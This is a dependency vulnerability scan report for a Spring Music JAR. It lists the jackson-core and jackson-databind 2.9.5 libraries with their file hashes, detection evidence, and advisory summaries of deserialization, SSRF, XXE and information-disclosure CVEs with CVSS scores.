Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: jackson-core-2.9.5.jarDescription:
Core Jackson processing abstractions (aka Streaming API), implementation for JSON License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-core-2.9.5.jar
MD5: ec59f24f7f8d9acf53301c562722adf2
SHA1: a22ac51016944b06fd9ffbc9541c6e7ce5eea117
SHA256: a2bebaa325ad25455b02149c67e6052367a7d7fc1ce77de000eed284a5214eac
Evidence Type Source Name Value Confidence Vendor file name jackson-core High Vendor jar package name base Highest Vendor jar package name core Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor jar package name json Highest Vendor Manifest automatic-module-name com.fasterxml.jackson.core Medium Vendor Manifest bundle-docurl https://github.com/FasterXML/jackson-core Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-core Medium Vendor Manifest implementation-build-date 2018-03-26 15:03:46+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-core Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-core High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url FasterXML/jackson-core Highest Product file name jackson-core High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name base Highest Product jar package name core Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product jar package name json Highest Product Manifest automatic-module-name com.fasterxml.jackson.core Medium Product Manifest bundle-docurl https://github.com/FasterXML/jackson-core Low Product Manifest Bundle-Name Jackson-core Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-core Medium Product Manifest implementation-build-date 2018-03-26 15:03:46+0000 Low Product Manifest Implementation-Title Jackson-core High Product Manifest specification-title Jackson-core Medium Product pom artifactid jackson-core Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-core High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url FasterXML/jackson-core High Version file version 2.9.5 High Version Manifest Bundle-Version 2.9.5 High Version Manifest Implementation-Version 2.9.5 High Version pom version 2.9.5 Highest
CVE-2025-49128 (OSSINDEX) suppress
Jackson-core contains core low-level incremental ("streaming") parser and generator abstractions used by Jackson Data Processor. Starting in version 2.0.0 and prior to version 2.13.0, a flaw in jackson-core's `JsonLocation._appendSourceDesc` method allows up to 500 bytes of unintended memory content to be included in exception messages. When parsing JSON from a byte array with an offset and length, the exception message incorrectly reads from the beginning of the array instead of the logical payload start. This results in possible information disclosure in systems using pooled or reused buffers, like Netty or Vert.x. This issue was silently fixed in jackson-core version 2.13.0, released on September 30, 2021, via PR #652. All users should upgrade to version 2.13.0 or later. If upgrading is not immediately possible, applications can mitigate the issue by disabling exception message exposure to clients to avoid returning parsing exception messages in HTTP responses and/or disabling source inclusion in exceptions to prevent Jackson from embedding any source content in exception messages, avoiding leakage.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-49128 for details CWE-209 Generation of Error Message Containing Sensitive Information
CVSSv2:
Base Score: MEDIUM (6.900000095367432) Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:com.fasterxml.jackson.core:jackson-core:2.9.5:*:*:*:*:*:*:* CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: jackson-databind-2.9.5.jarDescription:
General data-binding functionality for Jackson: works on core streaming API License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jackson-databind-2.9.5.jar
MD5: 34b37affbf74f5d199be10622ddc83cd
SHA1: 3490508379d065fe3fcb80042b62f630f7588606
SHA256: 0fb4e079c118e752cc94c15ad22e6782b0dfc5dc09145f4813fb39d82e686047
Evidence Type Source Name Value Confidence Vendor file name jackson-databind High Vendor jar package name databind Highest Vendor jar package name fasterxml Highest Vendor jar package name jackson Highest Vendor Manifest automatic-module-name com.fasterxml.jackson.databind Medium Vendor Manifest bundle-docurl http://github.com/FasterXML/jackson Low Vendor Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-databind Medium Vendor Manifest implementation-build-date 2018-03-26 15:13:41+0000 Low Vendor Manifest Implementation-Vendor FasterXML High Vendor Manifest Implementation-Vendor-Id com.fasterxml.jackson.core Medium Vendor Manifest specification-vendor FasterXML Low Vendor pom artifactid jackson-databind Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name jackson-databind High Vendor pom parent-artifactid jackson-base Low Vendor pom parent-groupid com.fasterxml.jackson Medium Vendor pom url http://github.com/FasterXML/jackson Highest Product file name jackson-databind High Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product jar package name databind Highest Product jar package name fasterxml Highest Product jar package name jackson Highest Product Manifest automatic-module-name com.fasterxml.jackson.databind Medium Product Manifest bundle-docurl http://github.com/FasterXML/jackson Low Product Manifest Bundle-Name jackson-databind Medium Product Manifest bundle-symbolicname com.fasterxml.jackson.core.jackson-databind Medium Product Manifest implementation-build-date 2018-03-26 15:13:41+0000 Low Product Manifest Implementation-Title jackson-databind High Product Manifest specification-title jackson-databind Medium Product pom artifactid jackson-databind Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name jackson-databind High Product pom parent-artifactid jackson-base Medium Product pom parent-groupid com.fasterxml.jackson Medium Product pom url http://github.com/FasterXML/jackson Medium Version file version 2.9.5 High Version Manifest Bundle-Version 2.9.5 High Version Manifest Implementation-Version 2.9.5 High Version pom version 2.9.5 Highest
CVE-2018-14721 suppress
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to conduct server-side request forgery (SSRF) attacks by leveraging failure to block the axis2-jaxws class from polymorphic deserialization. CWE-918 Server-Side Request Forgery (SSRF)
CVSSv3:
Base Score: CRITICAL (10.0) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-11307 suppress
An issue was discovered in FasterXML jackson-databind 2.0.0 through 2.9.5. Use of Jackson default typing along with a gadget class from iBatis allows exfiltration of content. Fixed in 2.7.9.4, 2.8.11.2, and 2.9.6. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
OSSINDEX - [CVE-2018-11307] CWE-502: Deserialization of Untrusted Data OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11307 OSSIndex - https://blog.sonatype.com/jackson-databind-remote-code-execution OSSIndex - https://blog.sonatype.com/jackson-databind-the-end-of-the-blacklist OSSIndex - https://github.com/FasterXML/jackson-databind/issues/2032 af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE Vulnerable Software & Versions: (show all )
CVE-2018-14718 suppress
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the slf4j-ext class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-14719 suppress
FasterXML jackson-databind 2.x before 2.9.7 might allow remote attackers to execute arbitrary code by leveraging failure to block the blaze-ds-opt and blaze-ds-core classes from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-14720 suppress
FasterXML jackson-databind 2.x before 2.9.7 might allow attackers to conduct external XML entity (XXE) attacks by leveraging failure to block unspecified JDK classes from polymorphic deserialization. CWE-611 Improper Restriction of XML External Entity Reference, CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2018-19360 suppress
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the axis2-transport-jms class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - MAILING_LIST,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY Vulnerable Software & Versions: (show all )
CVE-2018-19361 suppress
FasterXML jackson-databind 2.x before 2.9.8 might allow attackers to have unspecified impact by leveraging failure to block the openjpa class from polymorphic deserialization. CWE-502 Deserialization of Untrusted Data
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: HIGH (7.5) Vector: /AV:N/AC:L/Au:N/C:P/I:P/A:P References:
